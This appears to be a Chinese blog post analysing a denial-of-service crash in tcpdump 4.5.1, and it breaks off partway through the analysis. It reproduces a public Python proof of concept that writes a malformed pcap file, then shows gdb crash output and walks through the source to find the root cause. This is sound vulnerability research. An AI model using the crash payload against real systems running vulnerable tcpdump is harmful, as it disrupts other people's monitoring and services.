1426 lines
78 KiB
HTML
1426 lines
78 KiB
HTML
<!DOCTYPE html>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<html class="theme-next gemini use-motion" lang="zh-Hans">
|
||
<head><meta name="generator" content="Hexo 3.8.0">
|
||
<meta charset="UTF-8">
|
||
<meta http-equiv="X-UA-Compatible" content="IE=edge">
|
||
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
|
||
<meta name="theme-color" content="#222">
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<meta http-equiv="Cache-Control" content="no-transform">
|
||
<meta http-equiv="Cache-Control" content="no-siteapp">
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">
|
||
|
||
<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">
|
||
|
||
|
||
<link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">
|
||
|
||
|
||
<link rel="icon" type="image/png" sizes="32x32" href="/images/hackerrank.png?v=5.1.4">
|
||
|
||
|
||
<link rel="icon" type="image/png" sizes="16x16" href="/images/hackerrank.png?v=5.1.4">
|
||
|
||
|
||
<link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">
|
||
|
||
|
||
|
||
|
||
|
||
<meta name="keywords" content="TCPDUMP,拒绝服务攻击,">
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<meta name="description" content="TCPDUMP 4.5.1 拒绝服务攻击漏洞分析Tcpdump介绍 tcpdump 是一个运行在命令行下的嗅探工具。它允许用户拦截和显示发送或收到过网络连接到该计算机的TCP/IP和其他数据包。tcpdump 适用于大多数的类Unix系统 操作系统:包括Linux、Solaris、BSD、Mac OS X、HP-UX和AIX 等等。在这些系统中,tcpdump 需要使用libpcap这个捕捉数据的">
|
||
<meta name="keywords" content="TCPDUMP,拒绝服务攻击">
|
||
<meta property="og:type" content="article">
|
||
<meta property="og:title" content="TCPDUMP拒绝服务攻击漏洞">
|
||
<meta property="og:url" content="https://cool-y.github.io/2018/12/25/TCPDUMP拒绝服务攻击漏洞/index.html">
|
||
<meta property="og:site_name" content="混元霹雳手">
|
||
<meta property="og:description" content="TCPDUMP 4.5.1 拒绝服务攻击漏洞分析Tcpdump介绍 tcpdump 是一个运行在命令行下的嗅探工具。它允许用户拦截和显示发送或收到过网络连接到该计算机的TCP/IP和其他数据包。tcpdump 适用于大多数的类Unix系统 操作系统:包括Linux、Solaris、BSD、Mac OS X、HP-UX和AIX 等等。在这些系统中,tcpdump 需要使用libpcap这个捕捉数据的">
|
||
<meta property="og:locale" content="zh-Hans">
|
||
<meta property="og:updated_time" content="2019-03-23T04:44:22.487Z">
|
||
<meta name="twitter:card" content="summary">
|
||
<meta name="twitter:title" content="TCPDUMP拒绝服务攻击漏洞">
|
||
<meta name="twitter:description" content="TCPDUMP 4.5.1 拒绝服务攻击漏洞分析Tcpdump介绍 tcpdump 是一个运行在命令行下的嗅探工具。它允许用户拦截和显示发送或收到过网络连接到该计算机的TCP/IP和其他数据包。tcpdump 适用于大多数的类Unix系统 操作系统:包括Linux、Solaris、BSD、Mac OS X、HP-UX和AIX 等等。在这些系统中,tcpdump 需要使用libpcap这个捕捉数据的">
|
||
|
||
|
||
|
||
<script type="text/javascript" id="hexo.configurations">
|
||
var NexT = window.NexT || {};
|
||
var CONFIG = {
|
||
root: '/',
|
||
scheme: 'Gemini',
|
||
version: '5.1.4',
|
||
sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
|
||
fancybox: true,
|
||
tabs: true,
|
||
motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
|
||
duoshuo: {
|
||
userId: '0',
|
||
author: '博主'
|
||
},
|
||
algolia: {
|
||
applicationID: '',
|
||
apiKey: '',
|
||
indexName: '',
|
||
hits: {"per_page":10},
|
||
labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
|
||
}
|
||
};
|
||
</script>
|
||
|
||
|
||
|
||
<link rel="canonical" href="https://cool-y.github.io/2018/12/25/TCPDUMP拒绝服务攻击漏洞/">
|
||
|
||
|
||
|
||
|
||
|
||
<title>TCPDUMP拒绝服务攻击漏洞 | 混元霹雳手</title>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
</head>
|
||
|
||
<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<div class="container sidebar-position-left page-post-detail">
|
||
<div class="headband"></div>
|
||
|
||
<header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
|
||
<div class="header-inner"><div class="site-brand-wrapper">
|
||
<div class="site-meta ">
|
||
|
||
|
||
<div class="custom-logo-site-title">
|
||
<a href="/" class="brand" rel="start">
|
||
<span class="logo-line-before"><i></i></span>
|
||
<span class="site-title">混元霹雳手</span>
|
||
<span class="logo-line-after"><i></i></span>
|
||
</a>
|
||
</div>
|
||
|
||
<p class="site-subtitle"></p>
|
||
|
||
</div>
|
||
|
||
<div class="site-nav-toggle">
|
||
<button>
|
||
<span class="btn-bar"></span>
|
||
<span class="btn-bar"></span>
|
||
<span class="btn-bar"></span>
|
||
</button>
|
||
</div>
|
||
</div>
|
||
|
||
<nav class="site-nav">
|
||
|
||
|
||
|
||
<ul id="menu" class="menu">
|
||
|
||
|
||
<li class="menu-item menu-item-home">
|
||
<a href="/" rel="section">
|
||
|
||
<i class="menu-item-icon fa fa-fw fa-home"></i> <br>
|
||
|
||
首页
|
||
</a>
|
||
</li>
|
||
|
||
|
||
<li class="menu-item menu-item-about">
|
||
<a href="/about/" rel="section">
|
||
|
||
<i class="menu-item-icon fa fa-fw fa-user"></i> <br>
|
||
|
||
关于
|
||
</a>
|
||
</li>
|
||
|
||
|
||
<li class="menu-item menu-item-tags">
|
||
<a href="/tags/" rel="section">
|
||
|
||
<i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
|
||
|
||
标签
|
||
</a>
|
||
</li>
|
||
|
||
|
||
<li class="menu-item menu-item-categories">
|
||
<a href="/categories/" rel="section">
|
||
|
||
<i class="menu-item-icon fa fa-fw fa-th"></i> <br>
|
||
|
||
分类
|
||
</a>
|
||
</li>
|
||
|
||
|
||
<li class="menu-item menu-item-archives">
|
||
<a href="/archives/" rel="section">
|
||
|
||
<i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
|
||
|
||
归档
|
||
</a>
|
||
</li>
|
||
|
||
|
||
|
||
<li class="menu-item menu-item-search">
|
||
|
||
<a href="javascript:;" class="popup-trigger">
|
||
|
||
|
||
<i class="menu-item-icon fa fa-search fa-fw"></i> <br>
|
||
|
||
搜索
|
||
</a>
|
||
</li>
|
||
|
||
</ul>
|
||
|
||
|
||
|
||
<div class="site-search">
|
||
|
||
<div class="popup search-popup local-search-popup">
|
||
<div class="local-search-header clearfix">
|
||
<span class="search-icon">
|
||
<i class="fa fa-search"></i>
|
||
</span>
|
||
<span class="popup-btn-close">
|
||
<i class="fa fa-times-circle"></i>
|
||
</span>
|
||
<div class="local-search-input-wrapper">
|
||
<input autocomplete="off" placeholder="搜索..." spellcheck="false" type="text" id="local-search-input">
|
||
</div>
|
||
</div>
|
||
<div id="local-search-result"></div>
|
||
</div>
|
||
|
||
|
||
|
||
</div>
|
||
|
||
</nav>
|
||
|
||
|
||
|
||
</div>
|
||
</header>
|
||
|
||
<main id="main" class="main">
|
||
<div class="main-inner">
|
||
<div class="content-wrap">
|
||
<div id="content" class="content">
|
||
|
||
|
||
<div id="posts" class="posts-expand">
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
|
||
|
||
|
||
|
||
<div class="post-block">
|
||
<link itemprop="mainEntityOfPage" href="https://cool-y.github.io/2018/12/25/TCPDUMP拒绝服务攻击漏洞/">
|
||
|
||
<span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
|
||
<meta itemprop="name" content="Cool-Y">
|
||
<meta itemprop="description" content>
|
||
<meta itemprop="image" content="/images/avatar.png">
|
||
</span>
|
||
|
||
<span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
|
||
<meta itemprop="name" content="混元霹雳手">
|
||
</span>
|
||
|
||
|
||
<header class="post-header">
|
||
|
||
|
||
|
||
<h1 class="post-title" itemprop="name headline">TCPDUMP拒绝服务攻击漏洞</h1>
|
||
|
||
|
||
<div class="post-meta">
|
||
<span class="post-time">
|
||
|
||
<span class="post-meta-item-icon">
|
||
<i class="fa fa-calendar-o"></i>
|
||
</span>
|
||
|
||
<span class="post-meta-item-text">发表于</span>
|
||
|
||
<time title="创建于" itemprop="dateCreated datePublished" datetime="2018-12-25T12:26:05+08:00">
|
||
2018-12-25
|
||
</time>
|
||
|
||
|
||
|
||
|
||
|
||
</span>
|
||
|
||
|
||
<span class="post-category">
|
||
|
||
<span class="post-meta-divider">|</span>
|
||
|
||
<span class="post-meta-item-icon">
|
||
<i class="fa fa-folder-o"></i>
|
||
</span>
|
||
|
||
<span class="post-meta-item-text">分类于</span>
|
||
|
||
|
||
<span itemprop="about" itemscope itemtype="http://schema.org/Thing">
|
||
<a href="/categories/二进制漏洞/" itemprop="url" rel="index">
|
||
<span itemprop="name">二进制漏洞</span>
|
||
</a>
|
||
</span>
|
||
|
||
|
||
|
||
|
||
</span>
|
||
|
||
|
||
|
||
|
||
<span class="post-comments-count">
|
||
<span class="post-meta-divider">|</span>
|
||
<span class="post-meta-item-icon">
|
||
<i class="fa fa-comment-o"></i>
|
||
</span>
|
||
<a href="/2018/12/25/TCPDUMP拒绝服务攻击漏洞/#comments" itemprop="discussionUrl">
|
||
<span class="post-comments-count gitment-comments-count" data-xid="/2018/12/25/TCPDUMP拒绝服务攻击漏洞/" itemprop="commentsCount"></span>
|
||
</a>
|
||
</span>
|
||
|
||
|
||
|
||
|
||
|
||
<span id="/2018/12/25/TCPDUMP拒绝服务攻击漏洞/" class="leancloud_visitors" data-flag-title="TCPDUMP拒绝服务攻击漏洞">
|
||
<span class="post-meta-divider">|</span>
|
||
<span class="post-meta-item-icon">
|
||
<i class="fa fa-eye"></i>
|
||
</span>
|
||
|
||
<span class="post-meta-item-text">阅读次数:</span>
|
||
|
||
<span class="leancloud-visitors-count"></span>
|
||
</span>
|
||
|
||
|
||
|
||
|
||
|
||
<div class="post-wordcount">
|
||
|
||
|
||
<span class="post-meta-item-icon">
|
||
<i class="fa fa-file-word-o"></i>
|
||
</span>
|
||
|
||
<span title="字数统计">
|
||
3.4k 字
|
||
</span>
|
||
|
||
|
||
|
||
<span class="post-meta-divider">|</span>
|
||
|
||
|
||
|
||
<span class="post-meta-item-icon">
|
||
<i class="fa fa-clock-o"></i>
|
||
</span>
|
||
|
||
<span title="阅读时长">
|
||
16 分钟
|
||
</span>
|
||
|
||
</div>
|
||
|
||
|
||
|
||
|
||
</div>
|
||
</header>
|
||
|
||
|
||
|
||
|
||
|
||
<div class="post-body" itemprop="articleBody">
|
||
|
||
|
||
|
||
|
||
|
||
<h1 id="TCPDUMP-4-5-1-拒绝服务攻击漏洞分析"><a href="#TCPDUMP-4-5-1-拒绝服务攻击漏洞分析" class="headerlink" title="TCPDUMP 4.5.1 拒绝服务攻击漏洞分析"></a>TCPDUMP 4.5.1 拒绝服务攻击漏洞分析</h1><h2 id="Tcpdump介绍"><a href="#Tcpdump介绍" class="headerlink" title="Tcpdump介绍"></a>Tcpdump介绍</h2><ol>
|
||
<li>tcpdump 是一个运行在命令行下的嗅探工具。它允许用户拦截和显示发送或收到过网络连接到该计算机的TCP/IP和其他数据包。tcpdump 适用于大多数的类Unix系统 操作系统:包括Linux、Solaris、BSD、Mac OS X、HP-UX和AIX 等等。在这些系统中,tcpdump 需要使用libpcap这个捕捉数据的库。其在Windows下的版本称为WinDump;它需要WinPcap驱动,相当于在Linux平台下的libpcap.</li>
|
||
<li>tcpdump能够分析网络行为,性能和应用产生或接收网络流量。它支持针对网络层、协议、主机、网络或端口的过滤,并提供and、or、not等逻辑语句来帮助你去掉无用的信息,从而使用户能够进一步找出问题的根源。</li>
|
||
<li>也可以使用 tcpdump 的实现特定目的,例如在路由器和网关之间拦截并显示其他用户或计算机通信。通过 tcpdump 分析非加密的流量,如Telnet或HTTP的数据包,查看登录的用户名、密码、网址、正在浏览的网站内容,或任何其他信息。因此系统中存在网络分析工具主要不是对本机安全的威胁,而是对网络上的其他计算机的安全存在威胁。</li>
|
||
</ol>
|
||
<h2 id="分析环境"><a href="#分析环境" class="headerlink" title="分析环境"></a>分析环境</h2><ul>
|
||
<li>Ubuntu 16.04.4 LTS i686</li>
|
||
<li>tcpdump 4.5.1</li>
|
||
<li>gdb with peda</li>
|
||
</ul>
|
||
<h2 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>漏洞复现</h2><p>这个漏洞触发的原因是,tcpdump在处理特殊的pcap包的时候,由于对数据包传输数据长度没有进行严格的控制,导致在连续读取数据包中内容超过一定长度后,会读取到无效的内存空间,从而导致拒绝服务的发生。对于这个漏洞,首先要对pcap包的结构进行一定的分析,才能够最后分析出漏洞的成因,下面对这个漏洞进行复现。</p>
|
||
<h3 id="编译安装tcpdump"><a href="#编译安装tcpdump" class="headerlink" title="编译安装tcpdump"></a>编译安装tcpdump</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">1. # apt-get install libpcap-dev</span><br><span class="line">2. # dpkg -l libpcap-dev</span><br><span class="line">3. # wget https://www.exploit-db.com/apps/973a2513d0076e34aa9da7e15ed98e1b-tcpdump-4.5.1.tar.gz</span><br><span class="line">4. # tar -zxvf 973a2513d0076e34aa9da7e15ed98e1b-tcpdump-4.5.1.tar.gz</span><br><span class="line">5. # cd tcpdump-4.5.1/</span><br><span class="line">6. # ./configure</span><br><span class="line">7. # make</span><br><span class="line">8. # make install</span><br><span class="line">9. # tcpdump –-version</span><br><span class="line"> tcpdump version 4.5.1</span><br><span class="line"> libpcap version 1.7.4</span><br></pre></td></tr></table></figure>
|
||
<h3 id="生成payload(来自exploit-db-payload)"><a href="#生成payload(来自exploit-db-payload)" class="headerlink" title="生成payload(来自exploit-db payload)"></a>生成payload(来自exploit-db payload)</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"># Exploit Title: tcpdump 4.5.1 Access Violation Crash</span><br><span class="line"># Date: 31st May 2016</span><br><span class="line"># Exploit Author: David Silveiro</span><br><span class="line"># Vendor Homepage: http://www.tcpdump.org</span><br><span class="line"># Software Link: http://www.tcpdump.org/release/tcpdump-4.5.1.tar.gz</span><br><span class="line"># Version: 4.5.1</span><br><span class="line"># Tested on: Ubuntu 14 LTS</span><br><span class="line">from subprocess import call</span><br><span class="line">from shlex import split</span><br><span class="line">from time import sleep</span><br><span class="line"></span><br><span class="line">def crash():</span><br><span class="line"> command = 'tcpdump -r crash'</span><br><span class="line"> buffer = '\xd4\xc3\xb2\xa1\x02\x00\x04\x00\x00\x00\x00\xf5\xff'</span><br><span class="line"> buffer += '\x00\x00\x00I\x00\x00\x00\xe6\x00\x00\x00\x00\x80\x00'</span><br><span class="line"> buffer += '\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00<\x9c7@\xff\x00'</span><br><span class="line"> buffer += '\x06\xa0r\x7f\x00\x00\x01\x7f\x00\x00\xec\x00\x01\xe0\x1a'</span><br><span class="line"> buffer += "\x00\x17g+++++++\x85\xc9\x03\x00\x00\x00\x10\xa0&\x80\x18\'"</span><br><span class="line"> buffer += "xfe$\x00\x01\x00\x00@\x0c\x04\x02\x08\n', '\x00\x00\x00\x00"</span><br><span class="line"> buffer += '\x00\x00\x00\x00\x01\x03\x03\x04'</span><br><span class="line"> with open('crash', 'w+b') as file:</span><br><span class="line"> file.write(buffer)</span><br><span class="line"> try:</span><br><span class="line"> call(split(command))</span><br><span class="line"> print("Exploit successful! ")</span><br><span class="line"> except:</span><br><span class="line"> print("Error: Something has gone wrong!")</span><br><span class="line">def main():</span><br><span class="line"> print("Author: David Silveiro ")</span><br><span class="line"> print(" tcpdump version 4.5.1 Access Violation Crash ")</span><br><span class="line"> sleep(2)</span><br><span class="line"> crash()</span><br><span class="line">if __name__ == "__main__":</span><br><span class="line"> main()</span><br></pre></td></tr></table></figure>
|
||
<h2 id="崩溃分析"><a href="#崩溃分析" class="headerlink" title="崩溃分析"></a>崩溃分析</h2><h3 id="pcap包格式"><a href="#pcap包格式" class="headerlink" title="pcap包格式"></a>pcap包格式</h3><p>首先来分析一下pcap包的格式,首先是pcap文件头的内容,在.h有所定义,这里将结构体以及对应变量含义都列出来。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">struct pcap_file_header {</span><br><span class="line"> bpf_u_int32 magic;</span><br><span class="line"> u_short version_major;</span><br><span class="line"> u_short version_minor;</span><br><span class="line"> bpf_int32 thiszone; /* gmt to local correction */</span><br><span class="line"> bpf_u_int32 sigfigs; /* accuracy of timestamps */</span><br><span class="line"> bpf_u_int32 snaplen; /* max length saved portion of each pkt */</span><br><span class="line"> bpf_u_int32 linktype; /* data link type (LINKTYPE_*) */</span><br><span class="line">};</span><br></pre></td></tr></table></figure></p>
|
||
<p>看一下各字段的含义:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"> magic: 4字节 pcap文件标识 目前为“d4 c3 b2 a1”</span><br><span class="line"> major: 2字节 主版本号 #define PCAP_VERSION_MAJOR 2</span><br><span class="line"> minor: 2字节 次版本号 #define PCAP_VERSION_MINOR 4</span><br><span class="line"> thiszone:4字节 时区修正 并未使用,目前全为0</span><br><span class="line"> sigfigs: 4字节 精确时间戳 并未使用,目前全为0</span><br><span class="line"> snaplen: 4字节 抓包最大长度 如果要抓全,设为0x0000ffff(65535),</span><br><span class="line"> tcpdump -s 0就是设置这个参数,缺省为68字节</span><br><span class="line"> linktype:4字节 链路类型 一般都是1:ethernet</span><br><span class="line"></span><br><span class="line">struct pcap_pkthdr {</span><br><span class="line"> struct timeval ts; /* time stamp */</span><br><span class="line"> bpf_u_int32 caplen; /* length of portion present */</span><br><span class="line"> bpf_u_int32 len; /* length this packet (off wire) */</span><br><span class="line">};</span><br><span class="line">struct timeval {</span><br><span class="line"> long tv_sec; /* seconds (XXX should be time_t) */</span><br><span class="line"> suseconds_t tv_usec; /* and microseconds */</span><br><span class="line">};</span><br><span class="line"> ts: 8字节 抓包时间 4字节表示秒数,4字节表示微秒数</span><br><span class="line"> caplen:4字节 保存下来的包长度(最多是snaplen,比如68字节)</span><br><span class="line"> len: 4字节 数据包的真实长度,如果文件中保存的不是完整数据包,可能比caplen大</span><br></pre></td></tr></table></figure></p>
|
||
<p>其中len变量是值得关注的,因为在crash文件中,对应len变量的值为00 3C 9C 37<br>这是一个很大的值,读取出来就是379C3C00,数非常大,实际上在wireshark中打开这个crash文件,就会报错,会提示这个数据包的长度已经超过了范围,而换算出来的长度就是379C3C00,这是触发漏洞的关键。</p>
|
||
<h3 id="gdb调试"><a href="#gdb调试" class="headerlink" title="gdb调试"></a>gdb调试</h3><p>首先通过gdb运行tcpdump,用-r参数打开poc生成的crash,tcp崩溃,到达漏洞触发位置<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line">1. Program received signal SIGSEGV, Segmentation fault.</span><br><span class="line">2. [----------------------------------registers-----------------------------------]</span><br><span class="line">3. EAX: 0x1</span><br><span class="line">4. EBX: 0x81e33bd --> 0x0</span><br><span class="line">5. ECX: 0x2e ('.')</span><br><span class="line">6. EDX: 0x0</span><br><span class="line">7. ESI: 0xbfffe201 ('.' <repeats 14 times>)</span><br><span class="line">8. EDI: 0xbfffe1db --> 0x30303000 ('')</span><br><span class="line">9. EBP: 0x10621</span><br><span class="line">10. ESP: 0xbfffe1ac --> 0x8053caa (<hex_and_ascii_print_with_offset+170>: mov ecx,DWORD PTR [esp+0xc])</span><br><span class="line">11. EIP: 0x8053c6a (<hex_and_ascii_print_with_offset+106>: movzx edx,BYTE PTR [ebx+ebp*2+0x1])</span><br><span class="line">12. EFLAGS: 0x10296 (carry PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)</span><br><span class="line">13. [-------------------------------------code-------------------------------------]</span><br><span class="line">14. 0x8053c5d <hex_and_ascii_print_with_offset+93>: je 0x8053d40 <hex_and_ascii_print_with_offset+320></span><br><span class="line">15. 0x8053c63 <hex_and_ascii_print_with_offset+99>: mov ebx,DWORD PTR [esp+0x18]</span><br><span class="line">16. 0x8053c67 <hex_and_ascii_print_with_offset+103>: sub esp,0x4</span><br><span class="line">17. => 0x8053c6a <hex_and_ascii_print_with_offset+106>: movzx edx,BYTE PTR [ebx+ebp*2+0x1]</span><br><span class="line">18. 0x8053c6f <hex_and_ascii_print_with_offset+111>: movzx ecx,BYTE PTR [ebx+ebp*2]</span><br><span class="line">19. 0x8053c73 <hex_and_ascii_print_with_offset+115>: push edx</span><br><span class="line">20. 0x8053c74 <hex_and_ascii_print_with_offset+116>: mov ebx,edx</span><br><span class="line">21. 0x8053c76 <hex_and_ascii_print_with_offset+118>: mov DWORD PTR [esp+0x18],edx</span><br><span class="line">22. [------------------------------------stack-------------------------------------]</span><br><span class="line">23. 0000| 0xbfffe1ac --> 0x8053caa (<hex_and_ascii_print_with_offset+170>: mov ecx,DWORD PTR [esp+0xc])</span><br><span class="line">24. 0004| 0xbfffe1b0 --> 0xb7fff000 --> 0x23f3c</span><br><span class="line">25. 0008| 0xbfffe1b4 --> 0x1</span><br><span class="line">26. 0012| 0xbfffe1b8 --> 0x2f5967 ('gY/')</span><br><span class="line">27. 0016| 0xbfffe1bc --> 0x0</span><br><span class="line">28. 0020| 0xbfffe1c0 --> 0x0</span><br><span class="line">29. 0024| 0xbfffe1c4 --> 0x7ffffff9</span><br><span class="line">30. 0028| 0xbfffe1c8 --> 0x81e33bd --> 0x0</span><br><span class="line">31. [------------------------------------------------------------------------------]</span><br><span class="line">32. Legend: code, data, rodata, value</span><br><span class="line">33. Stopped reason: SIGSEGV</span><br><span class="line">34. hex_and_ascii_print_with_offset (ident=0x80c04af "\n\t", cp=0x8204000 <error: Cannot access memory at address 0x8204000>,</span><br><span class="line">35. length=0xfffffff3, oset=0x20c40) at ./print-ascii.c:91</span><br><span class="line">36. 91 s2 = *cp++;</span><br></pre></td></tr></table></figure></p>
|
||
<p>从崩溃信息来看,出错位置为s2 = <em>cp++;崩溃原因为SIGSEGV,即进程执行了一段无效的内存引用或发生段错误。可以看到,问题出现在./print-ascii.c:91,而且此时指针读取[ebx+ebp</em>2+0x1]的内容,可能是越界读取造成的崩溃。<br>再结合源码信息可知,指针cp在自加的过程中访问到了一个没有权限访问的地址,因为这是写在一个while循环里,也就是是说nshorts的值偏大,再看nshorts怎么来的,由此nshorts = length / sizeof(u_short);可知,可能是函数传入的参数length没有控制大小导致,因此目标就是追踪length是如何传入的。<br>我们通过bt回溯一下调用情况。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">1. gdb-peda$ bt</span><br><span class="line">2. #0 hex_and_ascii_print_with_offset (ident=0x80c04af "\n\t", cp=0x8204000 <error: Cannot access memory at address 0x8204000>,</span><br><span class="line">3. length=0xfffffff3, oset=0x20c40) at ./print-ascii.c:91</span><br><span class="line">4. #1 0x08053e26 in hex_and_ascii_print (ident=0x80c04af "\n\t", cp=0x81e33bd "", length=0xfffffff3) at ./print-ascii.c:127</span><br><span class="line">5. #2 0x08051e7d in ieee802_15_4_if_print (ndo=0x81e1320 <Gndo>, h=0xbfffe40c, p=<optimized out>) at ./print-802_15_4.c:180</span><br><span class="line">6. #3 0x080a0aea in print_packet (user=0xbfffe4dc " \023\036\b\300\034\005\b\001", h=0xbfffe40c, sp=0x81e33a8 "@\377")</span><br><span class="line">7. at ./tcpdump.c:1950</span><br><span class="line">8. #4 0xb7fa3468 in ?? () from /usr/lib/i386-linux-gnu/libpcap.so.0.8</span><br><span class="line">9. #5 0xb7f940e3 in pcap_loop () from /usr/lib/i386-linux-gnu/libpcap.so.0.8</span><br><span class="line">10. #6 0x0804b3dd in main (argc=0x3, argv=0xbffff6c4) at ./tcpdump.c:1569</span><br><span class="line">11. #7 0xb7de9637 in __libc_start_main (main=0x804a4c0 <main>, argc=0x3, argv=0xbffff6c4, init=0x80b1230 <__libc_csu_init>,</span><br><span class="line">12. fini=0x80b1290 <__libc_csu_fini>, rtld_fini=0xb7fea880 <_dl_fini>, stack_end=0xbffff6bc) at ../csu/libc-start.c:291</span><br><span class="line">13. #8 0x0804c245 in _start ()</span><br></pre></td></tr></table></figure></p>
|
||
<p>函数调用流程<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">pcap_loop</span><br><span class="line"> |----print_packet</span><br><span class="line"> |-----hex_and_ascii_print</span><br><span class="line"> |-------- hex_and_ascii_print_with_offset</span><br></pre></td></tr></table></figure></p>
|
||
<p>由此可见,从main函数开始了一连串函数调用,git源码下来看看。<br>tcpdump.c找到pcap_loop调用<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">1. do {</span><br><span class="line">2. status = pcap_loop(pd, cnt, callback, pcap_userdata);</span><br><span class="line">3. if (WFileName == NULL) {</span><br><span class="line">4. /*</span><br><span class="line">5. * We're printing packets. Flush the printed output,</span><br><span class="line">6. * so it doesn't get intermingled with error output.</span><br><span class="line">7. */</span><br><span class="line">8. if (status == -2) {</span><br><span class="line">9. /*</span><br><span class="line">10. * We got interrupted, so perhaps we didn't</span><br><span class="line">11. * manage to finish a line we were printing.</span><br><span class="line">12. * Print an extra newline, just in case.</span><br><span class="line">13. */</span><br><span class="line">14. putchar('n');</span><br><span class="line">15. }</span><br><span class="line">16. (void)fflush(stdout);</span><br><span class="line">17. }</span><br></pre></td></tr></table></figure></p>
|
||
